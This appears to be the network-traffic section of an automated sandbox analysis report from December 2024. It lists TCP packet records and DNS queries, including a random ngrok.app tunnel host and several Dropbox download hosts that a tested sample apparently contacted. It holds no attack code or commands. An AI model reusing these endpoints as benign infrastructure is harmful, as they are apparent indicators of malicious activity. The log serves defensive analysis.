                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.087459087 CET52466443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.087582111 CET52466443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.093463898 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.093477011 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.093488932 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.093498945 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.093875885 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.093949080 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.094031096 CET44352466162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.096515894 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.232258081 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.236253977 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.400780916 CET44352466162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.421686888 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.436062098 CET52466443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.448185921 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.479713917 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.480782986 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.480855942 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.482315063 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.483326912 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.484230995 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.484991074 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.485064983 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.485197067 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.487054110 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.487212896 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.487816095 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.488570929 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.547614098 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.548705101 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.551146030 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.552391052 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.552604914 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.695086956 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.695303917 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.780524969 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.780647993 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.794919968 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.794933081 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.797187090 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.797586918 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.849318027 CET4960253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.167604923 CET53496021.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.498749018 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.498975992 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.499651909 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.499890089 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.500108957 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.500161886 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.500735998 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.500929117 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.501079082 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.501214027 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.503149986 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.503199100 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.567048073 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.567184925 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.573704004 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.574281931 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.606132984 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.606293917 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.715934038 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.716003895 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.718298912 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.718389988 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.794503927 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.794565916 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.795567036 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.795618057 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.814519882 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.814706087 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.814716101 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.814727068 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.814738035 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.814879894 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.815037966 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.815048933 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.815826893 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.815947056 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.816086054 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.816256046 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.816550016 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.816814899 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.817111969 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.817121983 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.817131996 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.817142010 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.818572998 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.818823099 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.818835020 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.818912983 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.819032907 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.827478886 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.827553034 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.888365030 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.888756990 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.922225952 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.922430992 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.030339956 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.030355930 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.032286882 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.032299042 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.032757044 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.108350039 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.108659029 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.109319925 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.129684925 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.132983923 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.141406059 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.141987085 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.168607950 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:42.168610096 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:43.382312059 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:43.382618904 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:43.815989971 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:43.816634893 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:43.816646099 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:43.817004919 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:44.470371008 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:44.470482111 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:44.786469936 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:44.787492990 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:44.787936926 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:44.793842077 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:45.538978100 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:45.539354086 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:45.856822014 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:45.858247042 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:45.879156113 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:45.890538931 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:47.814636946 CET5229653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:48.136051893 CET53522961.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:59.560853958 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:59.560996056 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:59.878751993 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:59.883445024 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:59.931027889 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:59.941929102 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:59.942020893 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:59.975087881 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:00.007118940 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:00.258691072 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:00.258706093 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:00.302285910 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.640407085 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.640943050 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.642431021 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.642921925 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.956031084 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.957448006 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.957932949 CET44353437172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.958411932 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.959861040 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.960184097 CET44350845162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.960963011 CET53437443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:02.961185932 CET50845443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:10.808032036 CET138138192.168.2.7192.168.2.255

                                                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.060597897 CET192.168.2.71.1.1.10xb4d5Standard query (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.778790951 CET192.168.2.71.1.1.10xc6f7Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.564604998 CET192.168.2.71.1.1.10xe9b0Standard query (0)uc4d30225f32433b48811132b259.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:32.426443100 CET192.168.2.71.1.1.10x3c2bStandard query (0)ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.319628000 CET192.168.2.71.1.1.10xd8dStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.319983959 CET192.168.2.71.1.1.10xc99dStandard query (0)www.dropbox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:35.739706039 CET192.168.2.71.1.1.10x7552Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:35.740097046 CET192.168.2.71.1.1.10x9feeStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.167330027 CET192.168.2.71.1.1.10xdb76Standard query (0)uc7569213660364555d096b4af3d.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.205168009 CET192.168.2.71.1.1.10x1942Standard query (0)uc7569213660364555d096b4af3d.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.205418110 CET192.168.2.71.1.1.10xb27aStandard query (0)uc7569213660364555d096b4af3d.dl.dropboxusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.505466938 CET192.168.2.71.1.1.10x823aStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.507124901 CET192.168.2.71.1.1.10xb9f9Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.508068085 CET192.168.2.71.1.1.10xeaa0Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.508368015 CET192.168.2.71.1.1.10xbc7fStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.556133032 CET192.168.2.71.1.1.10xc373Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.556305885 CET192.168.2.71.1.1.10x54c4Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:37.395941019 CET192.168.2.71.1.1.10x1afeStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:37.396233082 CET192.168.2.71.1.1.10xfa8Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.849318027 CET192.168.2.71.1.1.10x41d1Standard query (0)uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:47.814636946 CET192.168.2.71.1.1.10x69a3Standard query (0)ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.197990894 CET1.1.1.1192.168.2.70xb4d5No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app18.192.31.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.197990894 CET1.1.1.1192.168.2.70xb4d5No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.209.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.197990894 CET1.1.1.1192.168.2.70xb4d5No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app18.158.249.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.197990894 CET1.1.1.1192.168.2.70xb4d5No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.223.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.197990894 CET1.1.1.1192.168.2.70xb4d5No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.124.142.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.197990894 CET1.1.1.1192.168.2.70xb4d5No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.102.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.916085005 CET1.1.1.1192.168.2.70xc6f7No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.916085005 CET1.1.1.1192.168.2.70xc6f7No error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.850526094 CET1.1.1.1192.168.2.70xe9b0No error (0)uc4d30225f32433b48811132b259.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.850526094 CET1.1.1.1192.168.2.70xe9b0No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:32.735167027 CET1.1.1.1192.168.2.70x3c2bNo error (0)ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:32.735167027 CET1.1.1.1192.168.2.70x3c2bNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.457056999 CET1.1.1.1192.168.2.70xc99dNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.457144976 CET1.1.1.1192.168.2.70xd8dNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.457144976 CET1.1.1.1192.168.2.70xd8dNo error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.796307087 CET1.1.1.1192.168.2.70x6712No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.832902908 CET1.1.1.1192.168.2.70x47c6No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.832902908 CET1.1.1.1192.168.2.70x47c6No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:35.878931046 CET1.1.1.1192.168.2.70x9feeNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:35.879894972 CET1.1.1.1192.168.2.70x7552No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.498773098 CET1.1.1.1192.168.2.70x1942No error (0)uc7569213660364555d096b4af3d.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.498773098 CET1.1.1.1192.168.2.70x1942No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.498795986 CET1.1.1.1192.168.2.70xdb76No error (0)uc7569213660364555d096b4af3d.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.498795986 CET1.1.1.1192.168.2.70xdb76No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.523088932 CET1.1.1.1192.168.2.70xb27aNo error (0)uc7569213660364555d096b4af3d.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.642210960 CET1.1.1.1192.168.2.70x823aNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.642210960 CET1.1.1.1192.168.2.70x823aNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.643913984 CET1.1.1.1192.168.2.70xb9f9No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.644848108 CET1.1.1.1192.168.2.70xbc7fNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
